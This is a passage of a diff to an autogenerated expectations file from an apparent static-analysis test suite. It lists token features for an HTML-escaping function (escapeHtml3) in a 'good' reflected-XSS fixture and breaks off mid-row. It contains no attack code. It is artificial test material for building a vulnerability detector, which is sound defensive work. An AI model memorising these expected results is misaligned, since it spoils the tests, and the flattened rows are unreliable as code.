substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:95:12:95:21 | i < length | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:95:12:95:21 | i < length | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:95:16:95:21 | length | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:95:16:95:21 | length | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:95:16:95:21 | length | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:95:16:95:21 | length | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:95:16:95:21 | length | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:7:96:8 | ch | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:7:96:8 | ch | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:7:96:8 | ch | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:7:96:8 | ch | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:7:96:8 | ch | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:7:96:30 | ch = va ... deAt(i) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:7:96:30 | ch = va ... deAt(i) | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:7:96:30 | ch = va ... deAt(i) | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:7:96:30 | ch = va ... deAt(i) | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:7:96:30 | ch = va ... deAt(i) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:12:96:16 | value | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:12:96:16 | value | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:12:96:16 | value | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:12:96:16 | value | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:12:96:16 | value | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:12:96:27 | value.charCodeAt | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:12:96:27 | value.charCodeAt | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:12:96:27 | value.charCodeAt | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:12:96:27 | value.charCodeAt | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:12:96:27 | value.charCodeAt | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:12:96:30 | exceptional return of value.charCodeAt(i) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:12:96:30 | exceptional return of value.charCodeAt(i) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:12:96:30 | exceptional return of value.charCodeAt(i) | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:12:96:30 | exceptional return of value.charCodeAt(i) | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:12:96:30 | exceptional return of value.charCodeAt(i) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:12:96:30 | value.charCodeAt(i) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:12:96:30 | value.charCodeAt(i) | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:12:96:30 | value.charCodeAt(i) | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:12:96:30 | value.charCodeAt(i) | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:12:96:30 | value.charCodeAt(i) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:18:96:27 | charCodeAt | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:18:96:27 | charCodeAt | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:18:96:27 | charCodeAt | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:18:96:27 | charCodeAt | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:18:96:27 | charCodeAt | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:29:96:29 | i | CalleeFlexibleAccessPath | value.charCodeAt | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:29:96:29 | i | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:29:96:29 | i | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | @@ -20913,6 +139336,191 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:29:96:29 | i | enclosingFunctionName | escapeHtml3 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:29:96:29 | i | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:96:29:96:29 | i | receiverName | value | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:97:12 | ch | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:97:12 | ch | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:97:12 | ch | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:97:12 | ch | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:97:12 | ch | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:97:29 | ch === XMLChars.AMP | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:97:29 | ch === XMLChars.AMP | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:97:29 | ch === XMLChars.AMP | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:97:29 | ch === XMLChars.AMP | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:97:29 | ch === XMLChars.AMP | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:98:28 | ch === ... rs.QUOT | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:98:28 | ch === ... rs.QUOT | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:98:28 | ch === ... rs.QUOT | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:98:28 | ch === ... rs.QUOT | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:98:28 | ch === ... rs.QUOT | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:98:50 | ch === ... hars.LT | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:98:50 | ch === ... hars.LT | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:98:50 | ch === ... hars.LT | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:98:50 | ch === ... hars.LT | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:98:50 | ch === ... hars.LT | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:99:26 | ch === ... hars.GT | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:99:26 | ch === ... hars.GT | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:99:26 | ch === ... hars.GT | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:99:26 | ch === ... hars.GT | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:11:99:26 | ch === ... hars.GT | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:18:97:25 | XMLChars | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:18:97:25 | XMLChars | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:18:97:25 | XMLChars | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:18:97:25 | XMLChars | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:18:97:25 | XMLChars | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:18:97:29 | XMLChars.AMP | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:18:97:29 | XMLChars.AMP | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:18:97:29 | XMLChars.AMP | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:18:97:29 | XMLChars.AMP | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:18:97:29 | XMLChars.AMP | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:27:97:29 | AMP | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:27:97:29 | AMP | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:27:97:29 | AMP | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:27:97:29 | AMP | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:97:27:97:29 | AMP | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:9:98:10 | ch | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:9:98:10 | ch | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:9:98:10 | ch | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:9:98:10 | ch | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:9:98:10 | ch | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:9:98:28 | ch === XMLChars.QUOT | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:9:98:28 | ch === XMLChars.QUOT | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:9:98:28 | ch === XMLChars.QUOT | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:9:98:28 | ch === XMLChars.QUOT | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:9:98:28 | ch === XMLChars.QUOT | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:16:98:23 | XMLChars | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:16:98:23 | XMLChars | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:16:98:23 | XMLChars | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:16:98:23 | XMLChars | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:16:98:23 | XMLChars | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:16:98:28 | XMLChars.QUOT | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:16:98:28 | XMLChars.QUOT | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:16:98:28 | XMLChars.QUOT | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:16:98:28 | XMLChars.QUOT | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:16:98:28 | XMLChars.QUOT | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:25:98:28 | QUOT | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:25:98:28 | QUOT | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:25:98:28 | QUOT | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:25:98:28 | QUOT | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:25:98:28 | QUOT | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:33:98:34 | ch | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:33:98:34 | ch | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:33:98:34 | ch | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:33:98:34 | ch | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:33:98:34 | ch | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:33:98:50 | ch === XMLChars.LT | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:33:98:50 | ch === XMLChars.LT | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:33:98:50 | ch === XMLChars.LT | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:33:98:50 | ch === XMLChars.LT | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:33:98:50 | ch === XMLChars.LT | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:40:98:47 | XMLChars | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:40:98:47 | XMLChars | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:40:98:47 | XMLChars | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:40:98:47 | XMLChars | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:40:98:47 | XMLChars | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:40:98:50 | XMLChars.LT | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:40:98:50 | XMLChars.LT | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:40:98:50 | XMLChars.LT | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:40:98:50 | XMLChars.LT | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:40:98:50 | XMLChars.LT | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:49:98:50 | LT | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:49:98:50 | LT | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:49:98:50 | LT | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:49:98:50 | LT | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:98:49:98:50 | LT | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:9:99:10 | ch | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:9:99:10 | ch | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:9:99:10 | ch | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:9:99:10 | ch | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:9:99:10 | ch | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:9:99:26 | ch === XMLChars.GT | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:9:99:26 | ch === XMLChars.GT | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:99:9:99:26 | ch === XMLChars.GT | enclosingFunctionBody | value i 